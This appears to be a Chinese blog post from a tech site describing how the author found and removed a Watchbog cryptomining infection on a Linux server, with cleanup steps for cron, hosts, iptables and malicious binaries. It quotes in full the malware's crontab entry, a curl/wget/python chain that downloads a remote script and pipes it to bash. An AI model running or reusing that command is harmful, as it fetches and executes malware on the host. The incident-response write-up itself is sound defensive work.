您当前的位置:首页 > 电脑百科 > 安全防护 > 服务器/网站

服务器被挖矿了?用这个思路可以彻底解决

时间:2019-11-04 10:07:34  来源:  作者:

概述

最近运气不太好,居然有台服务器被挖矿了,下面记录下问题发生的过程和解决方法,仅供参考。


一、Watchbog挖矿病毒

1、服务器收到cpu报警,cpu被占用达到100%,登录服务器查看,发现cpu被一个watchbog的进程占满了,如下图所示:

服务器被挖矿了?用这个思路可以彻底解决

 

2、杀掉会话

发现用kill杀掉后,这个进程还是会隔一会自动起来,很明显被加入了定时任务,检查所示:

*/9 * * * * (curl -fsSL https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||wget -q -O- https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||Python -c 'import urllib2 as fbi;print fbi.urlopen("ht
tps://github.com/luckysBoys/lucks/blob/master/5.sh").read()'||curl -fsSL https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||wget -q -O - https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh||curl -fsSLk https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh -m 90||wget -q -O - https://raw.githubusercontent.com/luckysBoys/lucks/master/555.sh --no-check-certificate -t 2 -T 60)|bash
服务器被挖矿了?用这个思路可以彻底解决

 

打开这个URL,发现像是一堆base64的密文,密文地址。

3、当清除掉定时任务的内容之后,隔了一会,其又被加入了如上一模一样的内容,所以该病毒程序不是一般的病毒程序。

4、经过后来的了解,发现该进程watchbog为被植入的挖矿程序,该程序会在cron下面写入脚本,定期去pastebin.com下载木马开始挖矿,如果删除不彻底仍然会不定期启动这个挖矿程序。


二、解决过程

1、 修改/etc/hosts

通过观察定时任务内容,可以发现几个恶意网址,分别如下:

1)raw.githubusercontent.com
2)github.com

先将上述这些地址重定向到本地

服务器被挖矿了?用这个思路可以彻底解决

 

2、防火墙控制出入流量

将上述被攻击者携带的域名所对应的的ip地址进行ip限制。

--比如raw.githubusercontent.com对应的ip为10.20.208.21
iptables -A INPUT -s 10.20.209.21 -j DROP
iptables -A OUTPUT -s 10.20.209.21 -j DROP
iptables -A OUTPUT -j DROP -d 10.20.209.2
--保存修改内容
/sbin/service iptables save

3、移除curl get脚本

因为该挖矿程序会借助curl、wget命令去下载病毒,所以第一时间我们需要进行如下操作:

mv /usr/bin/curl /usr/bin/lruc
mv /usr/bin/wget /usr/bin/tegw

如果确认病毒彻底被删除,我们可以不需要操作。

 

4、 删掉cron里面的相关任务

crontab -l 
/etc/cron.d 
/etc/cron.deny 
/etc/cron.monthly 
/etc/cron.daily 
/etc/cron.hourly 
/etc/crontab 
/etc/cron.weekly

上述8个与cron相关的文件目录我们都需要仔细检查一遍,凡是有关不知名的域名等信息都要彻底删除。

1) crontab -l

服务器被挖矿了?用这个思路可以彻底解决

 

2)/etc/cron.d

该目录下新增了好几个命令:Appache、root、system

服务器被挖矿了?用这个思路可以彻底解决

 

3)/etc/cron.deny

服务器被挖矿了?用这个思路可以彻底解决

 

没有发现

4)/etc/cron.monthly

服务器被挖矿了?用这个思路可以彻底解决

 

5)/etc/cron.daily

服务器被挖矿了?用这个思路可以彻底解决

 

6)/etc/cron.hourly

服务器被挖矿了?用这个思路可以彻底解决

 

7)/etc/crontab

在crontab文件中还发现了新的潜藏命令httpntp、ftpDNS

服务器被挖矿了?用这个思路可以彻底解决

 

8)/etc/cron.weekly

服务器被挖矿了?用这个思路可以彻底解决

 

没有发现

最后在用find过滤一遍,确保完全清除干净。

5、 删除恶意命令

同时我们还发现了恶意命令/bin/httpntp、/bin/ftpsdns、/usr/bin/watchbog

服务器被挖矿了?用这个思路可以彻底解决

 


服务器被挖矿了?用这个思路可以彻底解决

 

之所以看到这些恶意命令,是从定时任务日志(/var/log/cron)中发现的。

服务器被挖矿了?用这个思路可以彻底解决

 

6、 删除tmp目录下timesyncc.service文件

文件详情如下:

服务器被挖矿了?用这个思路可以彻底解决

 

7、杀掉watchbog进程

ps -ef|grep watchbog|awk '{print $2}'|xargs kill -9

总结

面对挖矿进程我简单总结了以下几点,如果遇到挖矿进程处理先后顺序如下:

1)查看定时任务,找到挖矿程序在执行的内容。

2)将恶意网址的hosts全部重定向到本地(127.0.0.1)

3)仔细查看审核与定时任务有关的文件和目录,进行清除

4)删除恶意的命令与包,重命名系统中被利用的命令

5)杀掉对应恶意进程(为什么放到最后呢?因为就算最早杀掉,其还是会因为定时任务等等自动启动)



Tags:挖矿   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系,我们将及时更正、删除,谢谢。
▌相关推荐
继内蒙古率先响应国务院金融稳定发展委员会提出的“打击比特币挖矿和交易行为”后,近日,青海、新疆、云南、四川等多地出台相关政策对虚拟货币“挖矿”进行整顿清理。虚拟货币“挖矿”市场迎来史上最严监管...【详细内容】
2021-07-04  Tags: 挖矿  点击:(9)  评论:(0)  加入收藏
之前当别的地方陆续叫停虚拟货币挖矿时,四川的“矿工”还曾心存侥幸的。因为内蒙、新疆等地挖矿用电是以火电为主,污染大;但四川挖矿用的是水电,是一种清洁、可再生的能源,且矿企...【详细内容】
2021-06-21  Tags: 挖矿  点击:(17)  评论:(0)  加入收藏
现如今互联网技术掀起的数字货币热潮风靡各行各业,随之比特币挖矿销售市场的迅速提温,云算力(亦称云挖币)在基础理论上能够使服务平台客户得到互利共赢,云挖矿为这种灵便、高效...【详细内容】
2021-05-12  Tags: 挖矿  点击:(51)  评论:(0)  加入收藏
所谓的矿就是一个个数据包,这些数据包需要解密。一般来说都是由CPU来算的,但是一个两个可以,一堆一堆的CPU也受不了。又因为这些数据包的计算量很大,但计算方式简单,而这正符合GP...【详细内容】
2021-05-07  Tags: 挖矿  点击:(171)  评论:(0)  加入收藏
现在,如果你还想在家用笔记本或家用电脑“挖矿”,绝对是吃饱了撑的,除了电力浪费,就连比特币的最小单位1聪(1比特币为1亿个聪)也无法挖到。如果比特币挖矿这件事真的有这么简单,...【详细内容】
2021-05-06  Tags: 挖矿  点击:(54)  评论:(0)  加入收藏
你打开手机,开始一局王者荣耀,试图从倔强青铜挣扎出来,大概半小时后,手机变得飞烫,你丢下手机,重新陷入无限...【详细内容】
2021-04-28  Tags: 挖矿  点击:(28)  评论:(0)  加入收藏
你很可能会听到“比特币挖矿”一词,然后你的脑海中就开始想象拿着铲子的矿工,在泥土中挖掘金子的场景。事实证明,这样的比喻距离还不算贴切,比特币的挖掘远没有那么迷人,但同样具...【详细内容】
2021-04-15  Tags: 挖矿  点击:(61)  评论:(0)  加入收藏
加密货币价格一路高涨,显卡又买不起,怎么才能“廉价”挖矿? 黑客们动起了歪心思——“白嫖”服务器。...【详细内容】
2021-04-14  Tags: 挖矿  点击:(97)  评论:(0)  加入收藏
2021年,一枚比特币飙升到了57462.35美元,即使最近一段时间回调,也在4.6万美元左右。那么,相较法定货币,比特币有什么特点呢?其一,它在进行交易时,整个过程中中外当事人没办法对用户...【详细内容】
2021-03-29  Tags: 挖矿  点击:(64)  评论:(0)  加入收藏
段时间以来,比特币的行情可谓是“上蹿下跳”!据Coinmarketcap数据,1月8日,比特币创下了超过4.1万美元/枚的历史新高,市值超过7000亿美元。但其在1月11日猛跌,在12日跌至30568.82的...【详细内容】
2021-01-21  Tags: 挖矿  点击:(39)  评论:(0)  加入收藏
▌简易百科推荐
Web 安全地对于 Web 从业人员来说是一个非常重要的课题,所以在这里总结一下 Web 相关的安全攻防知识,希望以后不要再踩雷,也希望对看到这篇文章的同学有所帮助。今天这边文章主...【详细内容】
2021-07-09  知了堂    Tags:Web 安全   点击:(7)  评论:(0)  加入收藏
导读周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云...【详细内容】
2021-07-06    简书  Tags:入侵   点击:(16)  评论:(0)  加入收藏
一、概述服务端未对传入的跳转url变量进行检查和控制,可导致恶意用户构造一个恶意地址,诱导用户跳转到恶意网站。跳转漏洞一般用于钓鱼攻击,通过跳转到恶意网站欺骗用户输入用...【详细内容】
2021-06-24  IT运维笔记  今日头条  Tags:Web安全   点击:(13)  评论:(0)  加入收藏
1、文件共享服务端口: 端口号 端口说明 攻击方向 21/22/69 ftp/tftp文件传输协议 允许匿名上传、下载、爆破和嗅探操作 ...【详细内容】
2021-06-21  网安之道    Tags:端口   点击:(16)  评论:(0)  加入收藏
本文主要介绍服务器的概念、常见的服务器技术和架构组成,此外将详细介绍磁盘、RAID知识,网卡概念、分类和主流厂商和产品,内容大致分为3部分。 第1章、服务器通用基础知识简单...【详细内容】
2021-06-21  Pheenet菲尼特    Tags:服务器   点击:(21)  评论:(0)  加入收藏
欢迎搜索公众号:白帽子左一每天分享更多黑客技能,工具及体系化视频教程(免费领)某种原因,接手了一个授权的bc站。 内心是拒绝的,但是没办法,硬着头皮收下了。 其实都知道,bc站不是很...【详细内容】
2021-06-11  暗网视界  公众号  Tags:BC渗透   点击:(31)  评论:(0)  加入收藏
x00写在前面的话 记得老早就看到群友在说申请edusrc,注册账号没有邀请码需要提交漏洞,通过才给申请注册,一直想也注册上去看看,正好闲来无事,于是有了这一次的记录。码的比较严,...【详细内容】
2021-06-10  领航541  今日头条  Tags:渗透测试   点击:(34)  评论:(0)  加入收藏
DDoS之所以猖獗,是因为巨大的市场需求,尤其是在竞争激烈的行业。要想占领市场,十次宣传可能不如一次DDoS攻击快,鬼影互联但一次宣传可以发动十次甚至几十次DDoS攻击。现在国家越...【详细内容】
2021-06-02  芹菜视频剪辑    Tags:服务器   点击:(41)  评论:(0)  加入收藏
0x01 引言当我们遇到一个登录框或者统一授权登陆(SSO)的时候,一顿瞎操作,sql注入不成功,账户密码爆破不出来,源代码找不到,端口扫描没有结果。此时总是苦于不知道该如何进一步做...【详细内容】
2021-04-30  MachineGun  今日头条  Tags:文件爆破   点击:(89)  评论:(0)  加入收藏
随着越来越多的企业陆续上云,并通过云平台为用户提供服务,云端的 Web 应用程序防火墙(WAF)服务开始逐渐变得流行起来。面对与传统部署截然不同的环境和新的安全威胁,云端 WAF 服...【详细内容】
2021-04-25  阿卡迈  今日头条  Tags:应用防火墙   点击:(96)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条